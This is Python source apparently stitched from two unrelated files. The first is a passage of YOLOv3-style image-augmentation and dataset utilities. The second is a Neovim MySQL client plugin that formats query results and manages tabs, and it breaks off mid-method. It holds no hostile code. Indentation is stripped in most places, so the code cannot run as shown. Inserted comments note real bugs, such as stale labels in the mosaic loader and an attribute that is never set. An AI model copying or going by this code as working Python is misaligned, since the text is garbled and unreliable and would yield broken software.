assert img is not None, 'Image Not Found ' + img_path
r = self.img_size / max(img.shape) # size ratio
if self.augment and r < 1: # if training (NOT testing), downsize to inference shape
h, w, _ = img.shape
img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_LINEAR) # _LINEAR fastest
# Augment colorspace
if self.augment:
augment_hsv(img, hgain=self.hyp['hsv_h'], sgain=self.hyp['hsv_s'], vgain=self.hyp['hsv_v'])
return img
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_imagev2(self, i):
# loads 1 image from dataset index 'i', returns im, original hw, resized hw
im = self.imgs[i]
if im is None: # not cached in ram
path = self.img_files[i]
im = cv2.imread(path) # BGR
assert im is not None, 'Image Not Found ' + path
h0, w0 = im.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # ratio
if r != 1: # if sizes are not equal
im = cv2.resize(im, (int(w0 * r), int(h0 * r)),
interpolation=cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR)
return im, (h0, w0), im.shape[:2] # im, hw_original, hw_resized
else:
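        # NOTE: this cached branch assumes self.img_hw0 and self.img_hw were stored
        # when the image was cached; they do not appear to be set anywhere in this
        # file, so reaching this path with cached images would raise AttributeError.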
return self.imgs[i], self.img_hw0[i], self.img_hw[i] # im, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
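    # Randomly scale hue, saturation and value by factors in [1 - gain, 1 + gain],
    # clip to 255, and write the result back into img in place.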
x = (np.random.uniform(-1, 1, 3) * np.array([hgain, sgain, vgain]) + 1).astype(np.float32) # random gains
img_hsv = (cv2.cvtColor(img, cv2.COLOR_BGR2HSV) * x.reshape((1, 1, 3))).clip(None, 255).astype(np.uint8)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
# def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5): # original version
# # SV augmentation by 50%
# img_hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV) # hue, sat, val
#
# S = img_hsv[:, :, 1].astype(np.float32) # saturation
# V = img_hsv[:, :, 2].astype(np.float32) # value
#
# a = random.uniform(-1, 1) * sgain + 1
# b = random.uniform(-1, 1) * vgain + 1
# S *= a
# V *= b
#
# img_hsv[:, :, 1] = S if a < 1 else S.clip(None, 255)
# img_hsv[:, :, 2] = V if b < 1 else V.clip(None, 255)
# cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
def load_mosaic(self, index):
# loads images in a mosaic
labels4 = []
s = self.img_size
xc, yc = [int(random.uniform(s * 0.5, s * 1.5)) for _ in range(2)] # mosaic center x, y
img4 = np.zeros((s * 2, s * 2, 3), dtype=np.uint8) + 128 # base image with 4 tiles
indices = [index] + [random.randint(0, len(self.labels) - 1) for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img = load_image(self, index)
h, w, _ = img.shape
# place img in img4
if i == 0: # top left
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, max(xc, w), min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Load labels
label_path = self.label_files[index]
if os.path.isfile(label_path):
x = self.labels[index]
if x is None: # labels not preloaded
with open(label_path, 'r') as f:
x = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32)
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
# else:
# labels = np.zeros((0,5), dtype=np.float32)
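        # NOTE: if the label file is missing or empty, `labels` is stale from the
        # previous tile (or undefined for the first one); the commented-out else
        # branch above would initialize it to an empty array.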
labels4.append(labels)
labels4 = np.concatenate(labels4, 0)
# hyp = self.hyp
# img4, labels4 = random_affine(img4, labels4,
# degrees=hyp['degrees'],
# translate=hyp['translate'],
# scale=hyp['scale'],
# shear=hyp['shear'])
# Center crop
a = s // 2
img4 = img4[a:a + s, a:a + s]
labels4[:, 1:] -= a
return img4, labels4
def letterbox(img, new_shape=416, color=(128, 128, 128), mode='auto', interp=cv2.INTER_AREA):
# Resize a rectangular image to a 32 pixel multiple rectangle
# https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
r = float(new_shape) / max(shape) # ratio = new / old
else:
r = max(new_shape) / max(shape)
ratio = r, r # width, height ratios
new_unpad = (int(round(shape[1] * r)), int(round(shape[0] * r)))
# Compute padding https://github.com/ultralytics/yolov3/issues/232
    if mode == 'auto':  # minimum rectangle
        dw = np.mod(new_shape - new_unpad[0], 32) / 2  # width padding
        dh = np.mod(new_shape - new_unpad[1], 32) / 2  # height padding
    elif mode == 'square':  # square
        dw = (new_shape - new_unpad[0]) / 2  # width padding
        dh = (new_shape - new_unpad[1]) / 2  # height padding
    elif mode == 'rect':  # non-square rectangle
        dw = (new_shape[1] - new_unpad[0]) / 2  # width padding
        dh = (new_shape[0] - new_unpad[1]) / 2  # height padding
    elif mode == 'scaleFill':
        dw, dh = 0.0, 0.0
        new_unpad = (new_shape, new_shape)
        ratio = new_shape / shape[1], new_shape / shape[0]  # width, height ratios
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=interp) # INTER_AREA is better, INTER_LINEAR is faster
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, dw, dh
def random_affine(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# https://medium.com/uruvideo/dataset-augmentation-with-random-homographies-a8f4b44830d4
if targets is None:
targets = []
border = 0 # width of added border (optional)
height = img.shape[0] + border * 2
width = img.shape[1] + border * 2
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(img.shape[1] / 2, img.shape[0] / 2), scale=s)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(-translate, translate) * img.shape[0] + border # x translation (pixels)
T[1, 2] = random.uniform(-translate, translate) * img.shape[1] + border # y translation (pixels)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
M = S @ T @ R # Combined rotation matrix. ORDER IS IMPORTANT HERE!!
imw = cv2.warpAffine(img, M[:2], dsize=(width, height), flags=cv2.INTER_AREA,
borderValue=(128, 128, 128)) # BGR order borderValue
# Return warped points also
if len(targets) > 0:
n = targets.shape[0]
points = targets[:, 1:5].copy()
area0 = (points[:, 2] - points[:, 0]) * (points[:, 3] - points[:, 1])
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = points[:, [0, 1, 2, 3, 0, 3, 2, 1]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = (xy @ M.T)[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# reject warped points outside of image
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
w = xy[:, 2] - xy[:, 0]
h = xy[:, 3] - xy[:, 1]
area = w * h
ar = np.maximum(w / (h + 1e-16), h / (w + 1e-16))
i = (w > 4) & (h > 4) & (area / (area0 + 1e-16) > 0.1) & (ar < 10)
targets = targets[i]
targets[:, 1:5] = xy[i]
return imw, targets
def cutout(image, labels):
# https://arxiv.org/abs/1708.04552
# https://github.com/hysts/pytorch_cutout/blob/master/dataloader.py
# https://towardsdatascience.com/when-conventional-wisdom-fails-revisiting-data-augmentation-for-self-driving-cars-4831998c5509
h, w = image.shape[:2]
def bbox_ioa(box1, box2, x1y1x2y2=True):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 # + [0.25] * 4 + [0.125] * 16 + [0.0625] * 64 + [0.03125] * 256 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
mask_color = [random.randint(0, 255) for _ in range(3)]
image[ymin:ymax, xmin:xmax] = mask_color
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.90] # remove >90% obscured labels
return labels
def convert_images2bmp():
# cv2.imread() jpg at 230 img/s, *.bmp at 400 img/s
for path in ['../coco/images/val2014/', '../coco/images/train2014/']:
folder = os.sep + Path(path).name
output = path.replace(folder, folder + 'bmp')
if os.path.exists(output):
shutil.rmtree(output) # delete output folder
os.makedirs(output) # make new output folder
for f in tqdm(glob.glob('%s*.jpg' % path)):
save_name = f.replace('.jpg', '.bmp').replace(folder, folder + 'bmp')
cv2.imwrite(save_name, cv2.imread(f))
for label_path in ['../coco/trainvalno5k.txt', '../coco/5k.txt']:
with open(label_path, 'r') as file:
lines = file.read()
lines = lines.replace('2014/', '2014bmp/').replace('.jpg', '.bmp').replace(
'/Users/glennjocher/PycharmProjects/', '../')
with open(label_path.replace('5k', '5k_bmp'), 'w') as file:
file.write(lines)
def create_folder(path='./new_folder'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def exif_transpose(image):
"""
Transpose a PIL image accordingly if it has an EXIF Orientation tag.
From https://github.com/python-pillow/Pillow/blob/master/src/PIL/ImageOps.py
:param image: The image to transpose.
:return: An image.
"""
exif = image.getexif()
orientation = exif.get(0x0112, 1) # default 1
if orientation > 1:
method = {2: Image.FLIP_LEFT_RIGHT,
3: Image.ROTATE_180,
4: Image.FLIP_TOP_BOTTOM,
5: Image.TRANSPOSE,
6: Image.ROTATE_270,
7: Image.TRANSVERSE,
8: Image.ROTATE_90,
}.get(orientation)
if method is not None:
image = image.transpose(method)
del exif[0x0112]
image.info["exif"] = exif.tobytes()
return image
|
__init__.py
|
# -*- coding: utf-8 -*-
import csv
import io
import logging
import os
import threading
import time
import cxnstr
import greenlet
import pymysql
import pymysql.constants.FIELD_TYPE as FT
import pynvim
import six
import nvim_mysql.autocomplete
import nvim_mysql.util
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
NUMERIC_TYPES = [
FT.DECIMAL,
FT.TINY,
FT.SHORT,
FT.LONG,
FT.FLOAT,
FT.DOUBLE,
FT.LONGLONG,
FT.INT24,
FT.NEWDECIMAL,
]
DATE_TYPES = [
FT.TIMESTAMP,
FT.DATE,
FT.TIME,
FT.DATETIME,
FT.YEAR,
FT.NEWDATE,
]
OPTION_DEFAULTS = {
'aliases': None,
'auto_close_results': 0,
'aux_window_pref': 'results',
'use_spinner': 1,
}
SPINNER_CHARS = u"⠋⠙⠹⠸⠼⠴⠦⠧⠇⠏"
class NvimMySQLError(Exception):
pass
def prepend_type_hints_to_header(header, types):
for i, t in enumerate(types):
if t in NUMERIC_TYPES:
header[i] = '#' + header[i]
elif t in DATE_TYPES:
header[i] = '@' + header[i]
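# Example (added for clarity, not in the original source): given
# header = ['id', 'name', 'created'] with types [FT.LONG, FT.VAR_STRING, FT.DATETIME],
# the header becomes ['#id', 'name', '@created'] -- '#' marks numeric columns and
# '@' marks date/time columns.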
def display_value(v):
"""Return the value to display for one particular cell/value."""
if v is None:
v = u'NULL'
elif isinstance(v, bytes):
try:
v = v.decode('utf-8')
v = ' '.join(v.splitlines())
except UnicodeDecodeError:
if six.PY3:
v = '0x' + v.hex()
else:
v = '0x' + v.encode('hex')
else:
v = six.text_type(v)
v = ' '.join(v.splitlines())
return v
def results_to_table(header, rows, types=None):
"""Format query result set as an ASCII table.
If a list of field types is provided (from cursor.description), type hints
will be added to the headers.
Return a list of strings.
"""
header = header[:]
if types:
prepend_type_hints_to_header(header, types)
col_lengths = [max([len(display_value(r)) for r in col]) for col in zip(header, *rows)]
# Table elements.
horizontal_bar = '+' + '+'.join(['-' * (l + 2) for l in col_lengths]) + '+'
def table_row(row):
# Return a database row formatted as a table row.
return '|' + '|'.join(
[u' {:{}} '.format(display_value(v), l) for v, l in zip(row, col_lengths)]) + '|'
return [
horizontal_bar,
table_row(header),
horizontal_bar,
] + [table_row(r) for r in rows] + [
horizontal_bar
]
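# Rough sketch of the output shape (illustrative, not from the original source):
# results_to_table(['#id', 'name'], [(1, 'foo'), (2, 'bar')]) produces lines like
#   +-----+------+
#   | #id | name |
#   +-----+------+
#   | 1   | foo  |
#   | 2   | bar  |
#   +-----+------+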
def results_to_vertical(header, rows, types=None):
"""Format query result set as a series of field: value lines.
Each row will span len(row) lines.
If a list of field types is provided (from cursor.description), type hints
will be added to the headers.
Return a list of strings.
"""
header = header[:]
if types:
prepend_type_hints_to_header(header, types)
header_lengths = [len(h) for h in header]
max_header_length = max(header_lengths)
header_strs = ['{{:>{}}}'.format(max_header_length + 1).format(header[i]) for i in range(len(header))]
output = []
for i, row in enumerate(rows, 1):
if len(rows) > 1:
output.append('***** row {} *****'.format(i))
for j, v in enumerate(row):
output.append('{}: {}'.format(header_strs[j], display_value(v)))
if len(rows) > 1 and i < len(rows):
output.append('')
return output
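# Illustrative example (not in the original): results_to_vertical(['id', 'name'], [(1, 'foo')])
# yields the lines
#   '   id: 1'
#   ' name: foo'
# with headers right-aligned to the longest header name plus one space.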
def results_to_csv(header, rows):
"""Format query result set as a CSV file.
Note that CSV is a text format, so binary data that is not valid utf-8 will
cause an error.
"""
# In Python 2, the csv module can't accept unicode, so we have to give it UTF-8.
# In Python 3, the csv module accepts unicode.
def output_value(v):
if six.PY3:
if isinstance(v, bytes):
return v.decode('utf-8')
else:
if isinstance(v, unicode):
return v.encode('utf-8')
return v
f = six.StringIO()
csv_out = csv.writer(f)
csv_out.writerow([output_value(v) for v in header])
for row in rows:
csv_out.writerow([output_value(v) for v in row])
return f.getvalue().splitlines()
def format_results(results, format_='table', metadata=None):
if metadata is None:
metadata = {}
if results['type'] == 'read':
if format_ == 'table':
lines = results_to_table(results['header'], results['rows'], results['types'])
lines.extend(["", "{} row(s) in set, {} col(s)".format(results['count'], len(results['header']))])
elif format_ == 'csv':
lines = results_to_csv(results['header'], results['rows'])
elif format_ == 'raw_column':
lines = '\n'.join([str(r[0]) for r in results['rows']]).splitlines()
elif format_ == 'vertical':
lines = results_to_vertical(results['header'], results['rows'], results['types'])
else:
raise ValueError("Invalid results format '{}'".format(format_))
elif results['type'] == 'write':
lines = ["", "{} row(s) affected".format(results['count'])]
elif results['type'] == 'error':
lines = results['message'].splitlines()
if format_ == 'table':
duration = metadata.get('duration')
if duration is not None and results['type'] in ['read', 'write']:
lines[-1] += " ({:.2f} sec)".format(duration)
warnings = results.get('warnings')
if warnings:
lines.extend(['', '[warnings]:'])
for warning in warnings:
lines.append("({}) {}".format(warning[1], warning[2]))
query = metadata.get('query')
if query is not None:
lines.extend(['', '---', ''] + query.splitlines())
return lines
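# The formatters above consume a results dict shaped like the one built in
# MySQLTab.execute_queries below. A sketch for reference (field values are made up):
#   results = {'type': 'read', 'header': ['id'], 'types': [FT.LONG],
#              'rows': [(1,)], 'count': 1, 'warnings': []}
#   format_results(results, 'table', {'duration': 0.01, 'query': 'select 1 id'})
# returns the ASCII table lines plus a "1 row(s) in set, 1 col(s) (0.01 sec)" footer
# and the query echoed after a '---' separator.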
class MySQLTab(object):
"""Represents a MySQL-connected tabpage.
Each tab has one (primary) connection to a single server.
"""
AUTOID = 1
def __init__(self, mysql, vim, tabpage):
self.vim = vim
self.mysql = mysql
self.tabpage = tabpage
        self.autoid = MySQLTab.AUTOID
        MySQLTab.AUTOID += 1
self.conn = None
self.connection_string = None
self.server_name = None
self.status = {
'executing': False,
'killing': False,
'results_pending': False,
}
self.results = None
self.query = None
self.query_start = None
self.query_end = None
self.results_buffer = self._initialize_results_buffer()
self.results_format = None
self.tree = Tree(self)
self.tree_buffer = self._initialize_tree_buffer()
def _initialize_results_buffer(self):
cur_buf = self.vim.current.buffer
# Create
buf_name = "Results{}".format(self.autoid)
self.vim.command("badd {}".format(buf_name))
# Set up
results_buffer = list(self.vim.buffers)[-1]
self.vim.command("b! {}".format(results_buffer.number))
self.vim.command("setl buftype=nofile bufhidden=hide nowrap nonu noswapfile nostartofline")
self.vim.command("nnoremap <buffer> <S-Left> zH")
self.vim.command("nnoremap <buffer> <S-Right> zL")
# close window and go to previous
self.vim.command("nnoremap <buffer> q :let nr = winnr() <Bar> :wincmd p <Bar> :exe nr . \"wincmd c\"<CR>")
self.vim.command("nnoremap <buffer> <Leader>c :MySQLShowResults csv<CR>")
self.vim.command("nnoremap <buffer> <Leader>1 :MySQLShowResults raw_column<CR>")
self.vim.command("nnoremap <buffer> <Leader>t :MySQLShowResults table<CR>")
self.vim.command("nnoremap <buffer> <Leader>G :MySQLShowResults vertical<CR>")
self.vim.command("nnoremap <buffer> <Leader>f :MySQLFreezeResultsHeader<CR>")
# Switch back
self.vim.command("b! {}".format(cur_buf.number))
return results_buffer
def _initialize_tree_buffer(self):
cur_buf = self.vim.current.buffer
# Create
buf_name = "Tree{}".format(self.autoid)
self.vim.command("badd {}".format(buf_name))
# Set up
tree_buffer = list(self.vim.buffers)[-1]
self.vim.command("b! {}".format(tree_buffer.number))
self.vim.command("setl buftype=nofile bufhidden=hide nowrap nonu noswapfile")
self.vim.command("nnoremap <buffer> <Space> :MySQLTreeToggleDatabase<CR>")
self.vim.command("nnoremap <buffer> q :let nr = winnr() <Bar> :wincmd p <Bar> :exe nr . \"wincmd c\"<CR>")
self.vim.command("syn match Directory /^[^ ].*/")
# Switch back
self.vim.command("b! {}".format(cur_buf.number))
return tree_buffer
def set_connection(self, conn, connection_string, server_name):
"""Set this MySQL tab's database connection to conn."""
if self.conn:
self.conn.close()
self.conn = conn
self.connection_string = connection_string
self.server_name = server_name
self.tabpage.vars['MySQLServer'] = server_name
self.tree = Tree(self)
self.tree.refresh_data()
self.tree_buffer[:] = self.tree.render()
def update_status(self, **kwargs):
"""Set one or more status flags for this tab.
Use keyword arguments to do this. Example:
self.update_status(executing=False, results_pending=True)
"""
for k, v in kwargs.items():
if k not in self.status:
                raise KeyError(k)
self.status[k] = v
# In case multiple flags are set, the first listed below is the one
# that shows in vim.
status_flag = ''
if self.status['killing']:
status_flag = 'k'
elif self.status['executing']:
status_flag = 'e'
elif self.status['results_pending']:
status_flag = 'r'
logger.debug("status flag: {}".format(status_flag))
self.tabpage.vars['MySQLStatusFlag'] = status_flag
self.mysql.refresh_tabline()
def execute_queries(self, queries, combine_results):
"""Sequentially execute the given queries in this tab.
If there is an error, execution will stop and the error will be
displayed.
Assuming all queries succeed, if combine_results is True,
aggregate counts will be shown after the last query. (Note that
these counts pertain only to "write" queries.) If
combine_results is False, the results of the last query are
shown.
"""
# Ignore if a query is already running.
if self.status['executing']:
return
gr = greenlet.getcurrent()
cursor = self.conn.cursor()
def query_done():
logger.debug("query_done called")
gr.parent = greenlet.getcurrent()
gr.switch()
def run_query(query, result):
logger.debug("run_query called")
try:
cursor.execute(query)
result['description'] = cursor.description
result['rowcount'] = cursor.rowcount
result['rows'] = cursor.fetchall()
cursor.execute("show warnings")
result['warnings'] = cursor.fetchall()
except Exception as e:
result['error'] = "Error: " + repr(e)
else:
result['error'] = None
self.vim.async_call(query_done)
if combine_results:
self.query = ''
self.results = {'type': 'write', 'count': 0, 'warnings': []}
self.update_status(executing=True)
self.query_start = time.time()
for query in queries:
if combine_results:
if self.query:
self.query += '\n\n'
self.query += query
else:
self.query = query
query_result = {}
logger.debug("executing query: {}".format(query))
threading.Thread(target=run_query, args=[query, query_result]).start()
gr.parent.switch()
# Query is done.
if query_result['error']:
self.results = {'type': 'error', 'message': query_result['error']}
break
if combine_results:
# for "write" queries, add to count
if not cursor.description:
self.results['count'] += query_result['rowcount']
self.results['warnings'].extend(query_result['warnings'])
else:
if not query_result['description']:
self.results = {
'type': 'write',
'count': query_result['rowcount'],
'warnings': query_result['warnings'],
}
else:
header = [f[0] for f in query_result['description']]
types = [f[1] for f in query_result['description']]
rows = query_result['rows']
self.results = {
'type': 'read',
'header': header,
'types': types,
'rows': rows,
'count': query_result['rowcount'],
'warnings': query_result['warnings'],
}
self.query_end = time.time()
cursor.close()
self.update_status(executing=False, killing=False)
# TODO: Differentiate results pending from error pending?
self.update_status(results_pending=True)
self.vim.command('MySQLShowResults table {}'.format(self.autoid))
def execute_query(self, query):
"""Execute the given query in this tab.
Results will be displayed if appropriate when the query finishes.
"""
self.execute_queries([query], False)
def complete(self, findstart, base):
create_new_conn = self.status['executing']
if create_new_conn:
logger.debug("query is executing, so creating new connection for autocomplete")
db_params = cxnstr.to_dict(self.connection_string)
conn = pymysql.connect(use_unicode=True, **db_params)
else:
logger.debug("using existing connection for autocomplete")
conn = self.conn
result = nvim_mysql.autocomplete.complete(findstart, base, self.vim, conn.cursor())
if create_new_conn:
logger.debug("closing autocomplete connection")
conn.close()
return result
def get_aux_window(self, target):
target_buffer = self.results_buffer if target == 'results' else self.tree_buffer
for window in self.vim.current.tabpage.windows:
if window.buffer == target_buffer:
return window
return None
def get_results_window(self):
return self.get_aux_window('results')
def get_tree_window(self):
return self.get_aux_window('tree')
def open_aux_window(self, target):
# If target window is already open, jump to it.
target_window = self.get_aux_window(target)
if target_window is not None:
logger.debug("{} window is already open in this tab".format(target))
self.vim.command('{}wincmd w'.format(target_window.number))
return
# If not, open it.
# First, check to see if we'll need to give the other window precedence.
other = 'tree' if target == 'results' else 'results'
other_window = self.get_aux_window(other)
reopen_other_window = other_window is not None and self.mysql.get_option('aux_window_pref') == other
if reopen_other_window:
# If so, close for now (then we'll re-open).
self.vim.command("{}wincmd c".format(other_window.number))
# Open target window.
if target == 'results':
result_win_height = int(self.vim.current.window.height * 0.35)
split_command = "botright {} split".format(result_win_height)
else:
tree_win_width = int(self.vim.current.window.width * 0.17)
split_command = "vertical topleft {} split".format(tree_win_width)
logger.debug("split command: {}".format(split_command))
self.vim.command(split_command)
target_buffer = self.results_buffer if target == 'results' else self.tree_buffer
self.vim.command("b! {}".format(target_buffer.number))
if reopen_other_window:
self.open_aux_window(other)
# switch back to our window
self.vim.command("{}wincmd w".format(self.get_aux_window(target).number))
def open_results_window(self):
self.open_aux_window('results')
def open_tree_window(self):
self.open_aux_window('tree')
def close(self):
try:
self.conn.close()
        except Exception:
pass
self.vim.command("bd! {}".format(self.results_buffer.number))
self.vim.command("bd! {}".format(self.tree_buffer.number))
@pynvim.plugin
class MySQL(object):
"""Plugin interface to neovim."""
def __init__(self, vim):
self.vim = vim
self.tabs = {}
self.initialized = False
logger.debug("plugin loaded by host")
def get_option(self, name):
return self.vim.vars.get('nvim_mysql#{}'.format(name), OPTION_DEFAULTS[name])
@pynvim.command('MySQLConnect', nargs=1, sync=True)
def connect(self, args):
"""Use the given connection_string to connect the current tabpage to a MySQL server."""
target = args[0]
aliases = self.get_option('aliases')
if aliases is not None and target in aliases:
logger.debug("'{}' is an alias for '{}'".format(target, aliases[target]))
connection_string = aliases[target]
server_name = target
else:
connection_string = target
server_name = None
db_params = cxnstr.to_dict(connection_string)
if server_name is None:
server_name = db_params['host']
logger.debug("connecting to {}".format(connection_string))
conn = pymysql.connect(use_unicode=True, **db_params)
conn.autocommit(True)
logger.debug("connection succeeded")
tabpage = self.vim.current.tabpage
if tabpage in self.tabs:
logger.debug("this tab is already MySQL-connected, will replace connection")
tab = self.tabs[tabpage]
else:
logger.debug("this tab is not MySQL-connected, will initialize")
tab = self.tabs[tabpage] = MySQLTab(self, self.vim, tabpage)
tab.set_connection(conn, connection_string, server_name)
if self.vim.current.buffer.name == '' and 'current_syntax' not in self.vim.current.buffer.vars:
self.vim.command('set ft=mysql')
if not self.initialized:
self._initialize()
self.refresh_tabline()
@pynvim.command('MySQLExecQueryUnderCursor', sync=False)
def exec_query_under_cursor(self):
"""Execute the query under the cursor.
This command assumes that all queries are separated by at least one
blank line.
"""
if not self.initialized:
raise NvimMySQLError("Use MySQLConnect to connect to a database first")
current_tab = self.tabs.get(self.vim.current.tabpage, None)
if current_tab is None:
raise NvimMySQLError("This is not a MySQL-connected tabpage")
query, _ = nvim_mysql.util.get_query_under_cursor(
self.vim.current.buffer,
self.vim.current.window.cursor[0] - 1,
self.vim.current.window.cursor[1]
)
if query is not None:
current_tab.execute_query(query)
@pynvim.command('MySQLExecQueriesInRange', range='', sync=False)
def exec_queries_in_range(self, range):
"""Execute the queries in the visual selection.
Results of individual queries are not shown.
This command assumes that all queries are separated by at least one
blank line.
"""
if not self.initialized:
raise NvimMySQLError("Use MySQLConnect to connect to a database first")
current_tab = self.tabs.get(self.vim.current.tabpage, None)
if current_tab is None:
raise NvimMySQLError("This is not a MySQL-connected tabpage")
queries = nvim_mysql.util.get_queries_in_range(self.vim.current.buffer, range[0] - 1, range[1] - 1)
current_tab.execute_queries(queries, len(queries) > 1)
def _run_query_on_table_under_cursor(self, query_fmt):
"""Run a query on the table under the cursor."""
if not self.initialized:
raise NvimMySQLError("Use MySQLConnect to connect to a database first")
current_tab = self.tabs.get(self.vim.current.tabpage, None)
if current_tab is None:
raise NvimMySQLError("This is not a MySQL-connected tabpage")
# Special handling for tables in the tree buffer.
if self.vim.current.buffer == current_tab.tree_buffer:
# Ignore if we're on a database row.
if not self.vim.current.line.startswith(' '):
return
table = self.vim.current.line.strip()
database, _, _ = nvim_mysql.util.get_parent_database_in_tree(
self.vim.current.buffer,
self.vim.current.window.cursor[0] - 1
)
table = database + '.' + table
else:
word = nvim_mysql.util.get_word_under_cursor(
self.vim.current.buffer,
self.vim.current.window.cursor[0] - 1,
self.vim.current.window.cursor[1]
)
table = nvim_mysql.util.word_to_table(word)
if nvim_mysql.util.table_exists(current_tab.conn, table):
query = query_fmt.format(table)
current_tab.execute_query(query)
else:
raise NvimMySQLError("Table '{}' does not exist".format(table))
@pynvim.command('MySQLDescribeTableUnderCursor', sync=False)
def describe_table_under_cursor(self):
"""Describe the table under the cursor."""
self._run_query_on_table_under_cursor("describe {}")
@pynvim.command('MySQLShowIndexesFromTableUnderCursor', sync=False)
def show_indexes_from_table_under_cursor(self):
"""Show indexes from the table under the cursor."""
self._run_query_on_table_under_cursor("show indexes from {}")
@pynvim.command('MySQLSampleTableUnderCursor', sync=False)
def sample_table_under_cursor(self):
"""Select a sampling of rows from the table under the cursor."""
self._run_query_on_table_under_cursor("select * from {} limit 100")
@pynvim.command('MySQLSelectAllFromTableUnderCursor', sync=False)
def select_all_from_table_under_cursor(self):
"""Select all rows from the table under the cursor."""
self._run_query_on_table_under_cursor("select * from {}")
@pynvim.command('MySQLCountTableUnderCursor', sync=False)
def count_table_under_cursor(self):
"""Select count(*) from the table under the cursor."""
self._run_query_on_table_under_cursor("select count(*) from {}")
@pynvim.command('MySQLKillQuery', sync=True)
def kill_query(self):
"""Kill the query currently executing in the current tabpage.
This command creates an additional connection to the server to
kill the query.
"""
if not self.initialized:
raise NvimMySQLError("Use MySQLConnect to connect to a database first")
